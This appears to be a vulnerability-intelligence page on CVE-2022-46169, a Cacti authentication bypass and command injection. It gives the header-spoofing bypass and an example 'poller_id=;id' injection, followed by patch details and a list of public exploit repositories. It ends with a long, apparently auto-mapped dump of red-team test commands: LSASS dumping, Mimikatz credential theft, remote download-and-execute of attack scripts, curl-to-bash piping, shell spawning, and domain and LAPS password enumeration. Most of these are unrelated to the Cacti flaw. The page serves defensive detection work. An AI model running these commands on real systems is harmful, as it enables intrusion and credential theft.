CVE-2022-46169
Overview
This vulnerability is a command injection combined with an authentication bypass in the Cacti monitoring platform. The root cause lies in the improper handling of client IP address determination via the get_client_addr function, which trusts attacker-controlled HTTP headers, allowing bypass of hostname-based authorization in remote_agent.php. Subsequently, an attacker can exploit the poll_for_data function, which executes PHP scripts via proc_open using unsanitized input from the poller_id parameter, leading to arbitrary command execution.
Vulnerability Description
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`. This command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
Impact
An unauthenticated attacker can execute arbitrary operating system commands on the server hosting Cacti by exploiting this vulnerability. This enables unauthorized disclosure of sensitive information, modification of monitoring data, and potentially full system compromise. No valid credentials or user interaction are required, making exploitation straightforward. The ability to bypass authorization and execute commands can disrupt monitoring operations and facilitate lateral movement within the network environment.
Solution
Apply the vendor-provided patches included starting from Cacti versions 1.2.23 and later in the 1.2.x and 1.3.x branches. Refer to the official GitHub security advisory GHSA-6p93-p743-35gf and the commits 7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216 and a8d59e8fa5f0054aa9c6981b1cbe30ef0e2a0ec9 for detailed patch information. The fix involves preventing spoofing of the server IP in get_client_addr by restricting trust in HTTP_... $_SERVER variables. Follow the vendor advisory for upgrade instructions and verify that your instance is running a patched release.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in the Cacti monitoring platform arises from a critical flaw in the `remote_agent.php` file, which can be accessed without authentication. This vulnerability is rooted in the improper handling of client IP addresses, specifically through the `get_client_addr` function in the `lib/functions.php` file. The function relies on several `$_SERVER` variables, particularly those prefixed with `HTTP_`, which can be manipulated by an attacker. By exploiting this flaw, an attacker can bypass the authorization checks that are intended to ensure only legitimate users can access sensitive functionalities. Once authenticated, the attacker can execute arbitrary commands on the server by leveraging the `proc_open` function within the `poll_for_data` function, particularly when a `poller_item` is configured with the action type `POLLER_ACTION_SCRIPT_PHP`.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker can craft a request that includes a forged `Forwarded-For` header to impersonate the server's IP address. This manipulation allows the attacker to pass the hostname check in the `poller` table, thereby gaining unauthorized access to the `remote_agent.php` functionality. Once inside, the attacker can trigger the execution of arbitrary PHP scripts by providing crafted parameters such as `poller_id`. Given that both `host_id` and `local_data_id` can be easily brute-forced, the barrier to exploitation is significantly lowered, especially in environments where the vulnerable action type is commonly configured, such as in production instances using default templates.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Cacti for operational monitoring. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even full system compromise. An attacker could execute commands that alter system configurations, exfiltrate sensitive information, or deploy malicious software, resulting in severe business risks including financial loss, reputational damage, and regulatory penalties. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that it poses a significant threat to the integrity and availability of affected systems.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating Cacti to the latest versions, specifically those that address this vulnerability, is essential. Additionally, organizations should conduct thorough security assessments and penetration testing to identify and remediate any instances of this vulnerability within their environments. Network-level protections, such as firewalls and intrusion detection systems, can help monitor and block suspicious activity. Furthermore, restricting access to the `remote_agent.php` file and ensuring proper validation of input parameters can significantly reduce the risk of exploitation. Organizations should also consider implementing logging and monitoring solutions to detect any unauthorized access attempts or anomalous behavior related to Cacti's functionalities.
In conclusion, the command injection vulnerability in the Cacti platform represents a critical security risk that can be exploited by unauthenticated attackers to execute arbitrary commands on affected servers. The ease of exploitation, combined with the potential for significant real-world impact, necessitates immediate attention from organizations using this platform. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, ensuring the integrity and security of their operational monitoring environments.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-46169, indicating that exploitation attempts of this unauthenticated command injection vulnerability in Cacti have begun to surface in operational environments. Although the EPSS score remains high and stable, the emergence of multiple new proof-of-concept exploits on public repositories underscores increased attacker interest and lowers the barrier for malicious actors to weaponize this flaw. This development is significant for defenders as it signals a transition from theoretical risk to active exploitation, heightening the urgency for monitoring and response efforts. The current threat landscape now reflects a more immediate and tangible risk, elevating the vulnerability’s threat level from potential to active exploitation, which could lead to widespread compromise of affected systems if left unaddressed.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2022-46169, indicating increased exploitation attempts targeting vulnerable Cacti instances. This uptick in telemetry suggests that threat actors are intensifying efforts to leverage the unauthenticated command injection flaw, likely facilitated by the growing availability of diverse proof-of-concept exploits in public repositories. The persistence of a high EPSS score corroborates the sustained exploitability and attractiveness of this vulnerability to adversaries. This development elevates the immediacy of the threat, underscoring a shift from opportunistic scanning to more deliberate exploitation campaigns. For defenders, this means that monitoring for anomalous activity associated with remote_agent.php access should be prioritized, as the risk of successful compromise has become more pronounced. Consequently, the threat level for CVE-2022-46169 should be considered elevated, reflecting an active exploitation environment that demands heightened vigilance.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cacti | Cacti | All |
cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Cacti 1.2.22 unauthenticated command injection
exploits/linux/http/cacti_unauthenticated_cmd_injection
|
Stefan Schiller, Steven Seeley, Owen Gong +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Cacti v1.2.22 - Remote Command Execution (RCE) | Riadh Bouchahoua | webapps | php | - | View |
GitHub PoCs (37)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xf4n9x/CVE-2022-46169
CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.
|
0xf4n9x | 47 | 12 | 2022-12-08 | View |
|
FredBrave/CVE-2022-46169-CACTI-1.2.22
This is a exploit of CVE-2022-46169 to cacti 1.2.22. This exploit allows through an RCE to obtain a reverse shell on you...
|
FredBrave | 42 | 8 | 2023-05-01 | View |
|
sAsPeCt488/CVE-2022-46169
PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22
|
sAsPeCt488 | 29 | 7 | 2023-01-05 | View |
|
ariyaadinatha/cacti-cve-2022-46169-exploit
This is poc of CVE-2022-46169 authentication bypass and remote code execution
|
ariyaadinatha | 15 | 6 | 2023-03-11 | View |
|
c3rrberu5/CVE-2022-46169
Exploit to CVE-2022-46169 vulnerability
|
c3rrberu5 | 9 | 6 | 2023-01-13 | View |
|
sh4den/CVE-2022-46169
Cacti Unauthenticated Command Injection
|
sh4den | 3 | 2 | 2023-01-02 | View |
|
SystemVll/CVE-2022-46169
Cacti Unauthenticated Command Injection
|
SystemVll | 3 | 2 | 2023-01-02 | View |
|
icebreack/CVE-2022-46169
Fixed exploit for CVE-2022-46169 (originally from https://www.exploit-db.com/exploits/51166)
|
icebreack | 3 | 0 | 2023-04-13 | View |
|
m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2022-46169). Run it a...
|
m3ssap0 | 1 | 2 | 2023-04-01 | View |
|
N1arut/CVE-2022-46169_POC
RCE POC for CVE-2022-46169
|
N1arut | 3 | 0 | 2023-01-16 | View |
|
taythebot/CVE-2022-46169
CVE-2022-46169 - Cacti Blind Remote Code Execution (Pre-Auth)
|
taythebot | 1 | 2 | 2022-12-16 | View |
|
ruycr4ft/CVE-2022-46169
Exploit for cacti version 1.2.22
|
ruycr4ft | 3 | 0 | 2023-05-01 | View |
|
Habib0x0/CVE-2022-46169
Cacti: Unauthenticated Remote Code Execution Exploit in Ruby
|
Habib0x0 | 2 | 0 | 2023-01-15 | View |
|
0x0Jackal/CVE-2022-46169
Repo for CVE-2022-46169
|
0x0Jackal | 1 | 1 | 2023-03-20 | View |
|
Rickster5555/EH2-PoC
A simple PoC for CVE-2022-46169 a.k.a Cacti Unauthenticated Command Injection, a vulnerability allows an unauthenticated...
|
Rickster5555 | 0 | 2 | 2023-05-12 | View |
|
Safarchand/CVE-2022-46169
Improved PoC for Unauthenticated RCE on Cacti <= 1.2.22 - CVE-2022-46169
|
Safarchand | 1 | 1 | 2023-05-02 | View |
|
0xN7y/CVE-2022-46169
Exploit for CVE-2022-46169
|
0xN7y | 1 | 0 | 2023-11-23 | View |
|
antisecc/CVE-2022-46169
|
antisecc | 0 | 1 | 2023-05-21 | View |
|
dawnl3ss/CVE-2022-46169
Unauthenticated Command Injection in Cacti <= 1.2.22
|
dawnl3ss | 0 | 1 | 2023-08-01 | View |
|
copyleftdev/PricklyPwn
An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids...
|
copyleftdev | 1 | 0 | 2023-09-10 | View |
|
svchost9913/CVE-2022-46169_unauth_remote_code_execution
Unauthenticated Remote Code Execution through authentication bypass and command injection in Cacti < 1.2.23 and < 1.3.0
|
svchost9913 | 0 | 0 | 2023-04-11 | View |
|
devilgothies/CVE-2022-46169
PoC for CVE-2022-46169 that affects Cacti 1.2.22 version
|
devilgothies | 0 | 0 | 2023-04-29 | View |
|
yassinebk/CVE-2022-46169
CVE-2022-46169
|
yassinebk | 0 | 0 | 2023-04-30 | View |
|
r1nzleer/RCE-Cacti-1.2.22
Este es un código del exploit CVE-2022-46169, que recree utilizando Python3! Si por ahí estás haciendo una máquina de HT...
|
r1nzleer | 0 | 0 | 2023-05-02 | View |
|
BKreisel/CVE-2022-46169
🐍 Python Exploit for CVE-2022-46169
|
BKreisel | 0 | 0 | 2023-05-04 | View |
|
a1665454764/CVE-2022-46169
CVE-2022-46169
|
a1665454764 | 0 | 0 | 2023-08-30 | View |
|
mind2hex/CVE-2022-46169-Cacti-v1.2.22-RCE
|
mind2hex | 0 | 0 | 2024-03-28 | View |
|
alv-david/CVE-2022-46169-Cacti-1.2.22
Find out a modified Cacti public exploit!
|
alv-david | 0 | 0 | 2025-07-02 | View |
|
devAL3X/CVE-2022-46169_poc
|
devAL3X | 0 | 0 | 2023-04-01 | View |
|
imjdl/CVE-2022-46169
CVE-2022-46169
|
imjdl | 0 | 0 | 2022-12-07 | View |
|
nicostan15/CVE-2022-46169
|
nicostan15 | 0 | 0 | 2026-04-02 | View |
|
nou-man/CVE-2022-46169
Proof of concept / CTF script for exploiting CVE-2022-46169 in Cacti, versions >=1.2.22
|
nou-man | 0 | 0 | 2023-06-05 | View |
|
RdBBB3/SHELL-POC-CVE-2022-46169
|
RdBBB3 | 0 | 0 | 2025-05-21 | View |
|
miko550/CVE-2022-46169
|
miko550 | 0 | 0 | 2023-02-02 | View |
|
0xZon/CVE-2022-46169-Exploit
|
0xZon | 0 | 0 | 2023-09-10 | View |
|
HPT-Intern-Task-Submission/CVE-2022-46169
|
HPT-Intern-Task-Submission | 0 | 0 | 2024-06-12 | View |
|
lof1sec/CVE-2022-46169
Cacti v1.2.22: Unauthenticated Command Injection Vulnerability (CVE-2022-46169)
|
lof1sec | 0 | 0 | 2025-01-04 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
